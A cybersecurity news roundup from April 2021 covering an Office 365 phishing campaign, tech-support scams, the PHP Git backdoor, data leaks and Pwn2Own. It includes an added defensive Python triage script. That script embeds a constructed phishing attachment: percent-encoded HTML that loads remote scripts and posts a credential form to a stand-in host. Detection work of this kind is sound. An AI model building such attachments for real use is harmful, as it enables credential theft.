Cyber Security Headlines – April 9, 2021

Office 365 phishing hides behind HTML that stacks up like Legos

A recent phishing campaign used hidden building blocks of HTML code, stored both locally and remotely, to build a site that collects Microsoft Office 365 credentials. The code is hidden in JavaScript files that are glued together like so many Lego building blocks to create a site where victims’ logins are scooped up. It starts with an email carrying an attachment that claims to be an Excel file about an investment but is actually an HTML document containing a chunk of URL-encoded text. When Trustwave researchers picked apart the text, they found links to two JavaScript files hosted at a domain used for other phishing campaigns.

(Bleeping Computer)
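The technique described above gives a defender a concrete thing to check: an attachment that calls itself a spreadsheet but is really HTML, and whose body only reveals the remote scripts and credential-posting form once it is percent-decoded. The following triage script is an added example, not code from the article or from Trustwave; the attachment body, the hypothetical domain phish.example.invalid and the function names are all constructed for illustration.

```python
"""Added example: triage an e-mail attachment that claims to be Excel but
is HTML hiding percent-encoded markup (constructed sample, not real data)."""
import re
from urllib.parse import unquote, urlparse

# Constructed sample attachment: a small HTML wrapper whose real content is
# one percent-encoded blob written into the page at load time. Once decoded
# it pulls two remote scripts and posts a form to the same phishing host.
SAMPLE_ATTACHMENT = (
    "<html><body><script>document.write(unescape('"
    "%3Cscript%20src%3D%22https%3A%2F%2Fphish.example.invalid%2Fa.js%22%3E%3C%2Fscript%3E"
    "%3Cscript%20src%3D%22https%3A%2F%2Fphish.example.invalid%2Fb.js%22%3E%3C%2Fscript%3E"
    "%3Cform%20action%3D%22https%3A%2F%2Fphish.example.invalid%2Fpost.php%22%3E"
    "'))</script></body></html>"
)

SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.I)
FORM_ACTION = re.compile(r"<form[^>]+action=[\"']([^\"']+)[\"']", re.I)

# Magic bytes of the two Excel container formats (OOXML zip, legacy OLE2).
EXCEL_MAGIC = (b"PK\x03\x04", b"\xd0\xcf\x11\xe0")


def decode_layers(text, max_rounds=5):
    """Percent-decode repeatedly until the text stops changing; attachments
    are sometimes encoded more than once to defeat a single-pass scanner."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_html_not_excel(raw_bytes):
    """True when the file lacks an Excel header but contains an <html> tag."""
    head = raw_bytes[:4096].lower()
    return not raw_bytes.startswith(EXCEL_MAGIC) and b"<html" in head


def external_resources(html):
    """Return (script_urls, form_actions) visible after decoding all layers."""
    flat = decode_layers(html)
    return SCRIPT_SRC.findall(flat), FORM_ACTION.findall(flat)


def remote_hosts(html):
    """Set of hostnames the decoded attachment would contact."""
    scripts, forms = external_resources(html)
    return {urlparse(u).hostname for u in scripts + forms if urlparse(u).hostname}


def triage(raw_bytes):
    """Summarise the indicators a mail gateway would want to log or block on."""
    html = raw_bytes.decode("utf-8", errors="replace")
    scripts, forms = external_resources(html)
    return {
        "masquerading_html": is_html_not_excel(raw_bytes),
        "remote_scripts": scripts,
        "credential_forms": forms,
        "hosts": sorted(remote_hosts(html)),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_ATTACHMENT.encode()).items():
        print(f"{key}: {value}")
```

The useful signal is the combination: a file whose extension and magic bytes disagree, plus remote script and form targets that only appear after decoding. Either alone is noisy; together they match the campaign's shape closely enough to quarantine the message for review.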

Tech support scammers sending fake antivirus subscription bills

They’re sending emails pretending to be invoices from Norton LifeLock, Microsoft, and McAfee that claim the recipient will be charged between $350 and $399 for a three-year subscription unless they call to cancel. The attackers constantly change the email subjects, but according to Vade Security, all the messages purport to be a subscription bill from a well-known security company. The crooks hope that recipients call the number so they can talk the targets into giving them remote access to their computers. If they do, the scammers can install remote access software that can then be used to install malware.

(Bleeping Computer)

PHP user database leaked in recent Git server attack

Late last month, threat actors pushed malicious commits to the PHP programming language’s source repository, hosted on the Git server the PHP team maintains at git.php.net. The malicious commits added a backdoor to the PHP source code. The code maintainers are now saying that the threat actors may have gotten their hands on a user database containing passwords in order to make those unauthorized changes. Further investigation showed that the commits were pushed over HTTPS using password-based authentication, leading the maintainers to suspect a possible leak of the master.php.net user database.

(The Hacker News)

Trump’s Tweets won’t make it into the National Archives

Twitter won’t let the National Archives make the former president’s tweets available on its platform. It told Politico that its permanent suspension of Trump’s personal account means that the federal record keeper is blocked, just like everybody else. The National Archives and Records Administration has been working to create an official online archive of Trump’s tweets as president, including those that got him permanently suspended as a threat to public safety. Not all Trump-isms are off-limits: NARA already maintains archives of old tweets from the institutional and personal accounts of many other former Trump administration officials with which users can interact, retweet and like.

(Politico)

Thanks to our episode sponsor, Sotero

Okay, here’s a story that’ll warm your heart. A pharmaceutical company was having a really hard time making sensitive data available to downstream systems. Due to their security requirements, they were forced to transfer the data manually, which delayed the data’s availability by an entire month. Guess what they did? They turned to our sponsor – Sotero – to keep the data encrypted as it is sent to downstream systems. And here’s the best part . . . With the data secure while in motion, they shortened the data transfer time from a month to a few hours. Amazing! I encourage you to check out Sotero at Soterosoft.com.

Scraped data from 500m LinkedIn users is up for sale

Data purportedly scraped from 500 million LinkedIn profiles is up for sale on a popular criminal forum, and the seller has posted yet another 2 million records as proof-of-concept. The files contain information including users’ full names, email addresses, phone numbers, workplace information, links to other social media profiles, professional titles, other work-related data and more: all valuable data for phishers, spammers, and other online crooks who can use it to brute-force passwords. According to Security Affairs, forum users can view the leaked samples for about $2 worth of forum credits, while the entire 500 million user database is being auctioned for at least four digits.

(Security Affairs)

Facebook has no plans to notify half-billion affected by data leak

Facebook is sticking to its guns when it comes to not notifying more than 530 million users whose details were leaked prior to 2019. It never did, and it has no intention of doing so now, the company said on Wednesday. At any rate, Facebook isn’t entirely sure which users it would need to notify. Besides, users can’t fix the issue now that the data’s publicly available, a spokesman said. We’ll have to wait and see what regulators have to say about this, the latest in Facebook’s string of user-data bungling. As of Wednesday, the company was answering regulators’ questions.

(Reuters)

Win10 hacked a third time at Pwn2Own

On Wednesday, Microsoft’s operating system fell twice to contestants in the 2021 Pwn2Own. On Thursday, it got owned yet again. The trio of vulnerabilities allowed three separate sets of contestants to jack up privileges from a normal user to SYSTEM by exploiting, in order, 1) a race condition bug, 2) an undocumented integer overflow weakness, and 3) another previously unknown integer overflow bug. Google Chrome and the Chromium-based Microsoft Edge web browsers were also dismantled by use of a type mismatch bug, while Zoom Messenger was taken over by use of a zero-click exploit chain that combined three different bugs.

(Bleeping Computer)

US dark-web user imprisoned for trying to buy chemical weapons

A Missouri man was sentenced to 12 years for twice trying to buy a chemical weapon that he told a seller he’d use “soon after I receive it.” Using a stolen identity, 46-year-old Jason William Siesser paid about $150 in Bitcoin for three 10 milliliter units of the chemical, or enough to kill about 300 people. Investigators instead sent him a package full of an inert substance. A search of Siesser’s home turned up about 10 grams of the toxic compound cadmium arsenide, some 100 grams of cadmium metal, and around 500 mL of hydrochloric acid.

(InfoSecurity)